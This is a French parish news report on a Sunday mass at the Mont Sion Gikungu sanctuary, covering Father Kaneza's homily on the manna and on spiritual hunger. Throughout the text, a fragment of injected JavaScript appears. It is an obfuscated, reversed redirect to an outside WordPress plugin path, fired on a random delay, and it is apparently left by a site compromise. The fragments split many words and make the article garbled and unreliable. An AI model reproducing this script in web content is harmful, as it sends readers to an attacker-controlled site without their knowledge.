La célébration eucharistique de ce dix-huitième dimanche du Temps Ordinaire, année B, au Sanctuaire marial de la Paix et la Réconciliation de Mont Sion Gikungu a été présidée par le Vice-Recteur, le Père Floribert KANEZA. Signalons aussi la présence des Pères Marcien NDAYIZEYE, Jean Bosco HABONIMANA et Japhet SIMBIZI, tous Pères de Schoenstatt. Il a profité de cette occasion pour le montrer à l’assemblée de Dieu. Ce dernier ayant été ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la veille dans le Diocèse Bubanza par l’Évêque Jean NTARWARARA.
Dans son mot d’introduction, le célébrant a commencé par souhaiter la bienvenue à tous les fidèles présents dans l’église de la Sainte Trinité. Il a remercié le Seigneur pour ses bienfaits, son amour et sa grâce. Il a cité certains de ses bienfaits notamment l’ordination sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotale de SIMBIZI JAPHET la veille plus précisément à 12h 37 minutes, le quatorzième anniversaire de la chorale Sainte Maria Goretti. Précisons que c’est la même chorale qui a animé cette messe de 10 heures en chants liturgiques vêtue en bleu et blanc.
Les saintes Écritures ont été tirées respectivement du livre de l’Exode (Ex 16, 2-4.12-15), de la lettre de saint Paul apôtre aux Éphésiens (Ep 4, 17.20-24) et enfin de l’Évangile de Jésus Christ selon saint Jean (Jn 6, 24-35).
Dans son homélie, le Père KANEZA a d’abord parlé des lamentations des fils d’Israël dans le désert. Pour le Père, les raisons qui les poussaient à récriminer contre Moïse ne sont autres que la famine et la soif. Même s’ils protestaient contre Moise, c’est contre Dieu au fait qu’ils protestaient parce que Moise ne faisait que leur transmettre le message reçu de Dieu, a expliqué le vice-Recteur. Ils se sont rappelés des temps anciens en Égypte où ils mangeaient de la viande et du pain à satiété. Pour eux, Moise leur a sortir de l’Egypte pour les faire mourir de faim.
Moise, le Messager de Dieu, a transmis le message. Et Dieu, dans sa miséricorde et son amour infini, leur a promis de faire pleuvoir du pain pour eux et que quotidiennement ils sortiront pour recueillir leur ration. Quelle leçon peut-on tirer de ça ? Souvent, ce que Dieu nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne, il ne nous les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne pas parce que nous sommes pieux, nous savons priés mieux que les autres. C’est par miséricorde qu’il ne nous les accorde. Prenons le cas de ces fils d’Israël, c’est après lamentations voire insulte que Dieu leur octroi la manne. Profitant de cette occasion, Père Floribert a demandé à tout un chacun de ne pas se hâter à tirer des conclusions comme quoi les gens à qui rien ne marche que c’est à cause de leurs péchés.
Concernant la soif et la faim qui ont poussé le peuple à se lamenter, Père KANEZA les a scindées en deux. Il y a la faim spirituelle et la faim corporel. La faim corporelle nous pousse à manger matin-midi-soir tandis que la faim spirituelle nous pousse à chercher Dieu. Les chrétiens toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc nourrir le corps et l’esprit au même degré. Chercher constamment la face du Seigneur, avoir une relation intime avec Dieu, recevoir le Corps du Christ, abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner la vie ancienne, les mauvaises habitudes, a insisté le Vice-Recteur, c’est ça assouvir la faim spirituelle.
A force de laisser le Christ vivre et grandir en nous on finit par devenir de petits Jésus. Et en tant que de petits Jésus, nous sommes appelés à aider les autres en leur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnant à manger, à boire, à s’habiller. Comme Jésus le dit lui-même : « Car j’avais faim, et vous m’avez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné à manger ; j’avais soif, et vous m’avez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné à boire ; j’étais un étranger, et vous m’avez accueilli ; j’étais nu, et vous m’avez habillé ; j’étais malade, et vous m’avez visité ; j’étais en prison, et vous êtes venus jusqu’à moi! … ce que vous faites aux plus petits, c’est à moi que vous le faites. » Il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné encore l’exemple du bon samaritain. C’est sur ces paroles que le Père a conclu son homélie, tout en demandant aux fidèles de demander à Dieu de les mettre en pratique.
Vers la fin de la messe, le tout nouveau prêtre a eu l’occasion de saluer l’assemblée et c’est lui-même qui nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la bénédiction finale. Retenons que sa messe des prémices aura lieu dans la Paroisse MUZINDA le dimanche, le 08 août 2021.